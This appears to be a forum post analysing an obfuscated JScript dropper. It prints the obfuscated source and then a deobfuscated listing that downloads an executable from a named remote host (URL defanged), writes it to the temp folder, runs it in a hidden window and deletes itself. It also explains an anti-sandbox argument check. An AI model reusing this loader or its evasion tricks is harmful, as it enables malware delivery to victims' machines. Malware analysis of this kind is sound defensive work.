var cuqqywn0 = ["72744", "gu", "58492", "66141"];
var ukebt = ["53001", "24692", "72715", "L2"];
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];
var uxardykv5 = ['\\\\', "jhibembyt"];
function ogxetjowy() {
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}

function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}

function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}


function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}

function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}


function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}

function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}

function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
Second step : Look at the try...catch part :

// The try/catch is the real program; everything else only supplies string
// fragments to it. Each line is annotated with what the expression resolves
// to (strings by concatenation, numbers by subtraction of two constants).
try {
var eqnok2 = myjcigkab6; // WScript
// WScript["Arguments"]["Named"]["length"] - the script only continues when it
// was launched WITHOUT named arguments (/name:value). Otherwise siga88 is
// never assigned, `new siga88(...)` throws and the empty catch swallows it:
// an anti-sandbox / anti-analysis gate.
if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {

var siga88 = eval(qonijac[0] + usyl() + focvaq0[5] + miqypce2[6] + adefhi9() + ucynucji0[1] + wsycli9()); // eval("ActiveXObject") - the literal never appears in the file
}
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3]; // "Scripting.FileSystemObject"
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7(); // "ADODB.Stream"
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9(); // "MSXML2.XMLHTTP"
var azjod = new siga88(vihtew9); // ADODB.Stream
var urrigucx = new siga88(wjerco); // Scripting.FileSystemObject
var opcakco = new siga88(uglahup); // MSXML2.XMLHTTP
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3]; // "http://reworder.adultgamesite.ru/js/boxun4.exe"
var mysfefyg = eqnok2[tubvy()]; // WScript.ScriptFullName
azjod[yxubuhu()](); // stream.Open()
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0]; // "WScript.Shell"
azjod[lymuvh()] = spudni0[4] - idnyfij8[2]; // stream.Position = 185 - 185 = 0
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]); // http.open("GET", url, 703 - 703 = 0) - synchronous
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()](); // fso.GetSpecialFolder(2) + "\\" + fso.GetTempName()
azjod[hojy3()] = ytuzzy4[7] - 635; // stream.Type = 636 - 635 = 1 (binary)
opcakco[ydugo0()](); // http.send()
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa; // "cmd.exe /c " + temp file path
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) { // http.Status == 799 - 599 = 200

var zofa1 = new siga88(areglaly8); // WScript.Shell
azjod[jwesifr0()](opcakco[hogkevitm0()]); // stream.Write(http.ResponseBody)
azjod[jutu0()](yzysa); // stream.SaveToFile(temp file path)
azjod[isiqku2()](); // stream.Close()
zofa1[amjugaxqa8()](imytalir, unaca[0] - unafme[3]); // shell.run(cmd_line, 0) - hidden window
}
urrigucx[zaddeqpa0()](mysfefyg); // fso.deleteFile(WScript.ScriptFullName) - self-delete
} catch (yhvuhnybu2) {} // all errors swallowed, including the deliberate one from the argument check

In fact, the deobfuscation has to start from this part: every other variable and function exists only to supply the string fragments it needs.

var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
=> var wjerco = "Scri" +"ptin" + "g.Fi" + "leSy" + "stem" + "Obje" + "ct";
=> var wjerco = "Scripting.FileSystemObject";

The rest of the deobfuscation is done the same way, expression by expression; the numeric arguments resolve as 185 - 185 = 0, 703 - 703 = 0, 778 - 776 = 2, 636 - 635 = 1 and 799 - 599 = 200.

3) Deobfuscated version:

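// Deobfuscated dropper, JScript for Windows Script Host (wscript.exe / cscript.exe).
// Every string is the resolved value of one of the concatenations in the
// try/catch block of the obfuscated script. The URL is deliberately defanged
// (hxxp) so this listing cannot be run as-is.
try {
    // Anti-analysis gate that the obfuscated script wraps around the
    // ActiveXObject lookup (WScript.Arguments.Named.length): the constructor is
    // only resolved when the script was launched WITHOUT any named argument
    // (/name:value). Launched with one, oCtor stays undefined, the first `new`
    // below throws and the empty catch at the bottom hides it - the script
    // appears to do nothing. A sandbox that passes arguments sees no activity.
    var oCtor;
    if (!WScript.Arguments.Named.length) {
        // eval() keeps the literal "ActiveXObject" out of the file.
        oCtor = eval("ActiveXObject");
    }

    var oStream = new oCtor("ADODB.Stream");
    // object that receives the response body of the request

    var oFso = new oCtor("Scripting.FileSystemObject");
    // object used to build the temp path and to delete the script itself

    var oHttp = new oCtor("MSXML2.XMLHTTP");
    // object that makes the HTTP request

    var url = "hxxp://reworder.adultgamesite.ru/js/boxun4.exe"; // ACCESS DENIED BY KTS (CLOUD)
    var script_path_file = WScript.ScriptFullName;
    // full path of the currently running script

    oStream.Open();
    oStream.Position = 0;
    oHttp.open("GET", url, 0); // third argument 0 = synchronous request

    var temp_file_path = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
    // 2 = TemporaryFolder; random name - example: %TEMP%\radCB3AD.tmp
    // (no .exe extension on the dropped file)

    oStream.Type = 1; // 1 = adTypeBinary
    oHttp.send();
    var cmd_line = "cmd.exe /c " + temp_file_path;
    if (oHttp.Status == 200) {
        var oShell = new oCtor("WScript.Shell");
        oStream.Write(oHttp.ResponseBody);
        oStream.SaveToFile(temp_file_path);
        oStream.Close();
        oShell.run(cmd_line, 0); // window style 0 = hidden; payload is run
    }
    oFso.deleteFile(script_path_file); // the dropper deletes itself
} catch (e) {
    // every failure (no ActiveX, network/AV block, named arguments) is swallowed
}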

4) Conclusion about the obfuscation method used:

What looks "difficult" can actually be "easy": the whole script has to be read once to find the right order of steps for the deobfuscation; here everything hangs off the single try/catch block, so resolving its expressions one by one is enough.


5) Conclusion :

Deobfuscating the downloader script reveals the URLs, methods, paths, command lines, registry keys, UAC-bypass methods, etc. that it uses, and also whether a parameter has to be passed; only then can the payload itself be analysed dynamically on its own.

Here no parameter is required - but note the opposite check: the script only resolves ActiveXObject when WScript.Arguments.Named.length is 0, so launching it with any named argument (/name:value) makes it silently do nothing.
After submitting it to VirusTotal, the sandbox analysis showed no encryption behaviour: the payload probably detects that it is running in a protected environment (VM, sandbox, etc.) and stays dormant there
(see the spoiler at the beginning)

(Don't hesitate to look at my previous analyses; each time I try to analyse a different obfuscation method and its 'updates')
 
